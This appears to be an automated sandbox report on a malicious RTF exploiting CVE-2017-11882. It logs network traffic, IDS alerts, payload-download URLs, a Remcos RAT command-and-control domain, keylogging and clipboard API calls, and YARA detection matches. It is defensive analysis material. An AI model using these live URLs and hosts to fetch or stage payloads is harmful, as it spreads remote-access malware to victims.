                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162

                Networking

                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49166 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49168 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49167 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49180 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49169 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49165 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49170 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49181 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.235.137.223:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49179 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49182 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.235.137.223:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49183 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49171 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 192.3.101.29:14645
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49162
                Source: Malware configuration extractorURLs: camzeroconnect.duckdns.org
                Source: unknownDNS query: name: camzeroconnect.duckdns.org
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /220/RDESC.txt HTTP/1.1Host: 185.235.137.223Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 207.241.227.96 207.241.227.96
                Source: Joe Sandbox ViewIP Address: 192.3.101.29 192.3.101.29
                Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: AFRARASAIR AFRARASAIR
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: global trafficHTTP traffic detected: GET /220/someimportantmeetingsgoing.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426D42 recv,9_2_00426D42
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E26221B0-A38A-46AA-9837-7495B9BE5CE0}.tmpJump to behavior
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: ia601706.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: camzeroconnect.duckdns.org
                Source: powershell.exe, 00000008.00000002.374544263.00000000025FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223
                Source: powershell.exe, 00000008.00000002.374544263.00000000025FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/RDESC.txt
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.359523259.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIF
                Source: EQNEDT32.EXE, 00000002.00000002.359523259.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIF$
                Source: EQNEDT32.EXE, 00000002.00000002.359523259.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIF4
                Source: EQNEDT32.EXE, 00000002.00000002.359523259.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/220/someimportantmeetingsgoing.tIFj
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 00000008.00000002.373789088.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000006.00000002.378843642.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.374544263.00000000023A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000008.00000002.374544263.00000000024DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org
                Source: powershell.exe, 00000008.00000002.373849299.0000000000850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.373849299.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.373806430.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.373789088.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.374544263.00000000024DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
                Source: powershell.exe, 00000006.00000002.378843642.0000000002412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_LR
                Source: powershell.exe, 00000008.00000002.375410076.00000000033C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000008.00000002.377150281.0000000005123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041CA73 SystemParametersInfoW

                System Summary

                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPED Matched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00401E65 appears 34 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00434801 appears 41 times
                Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 9302
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
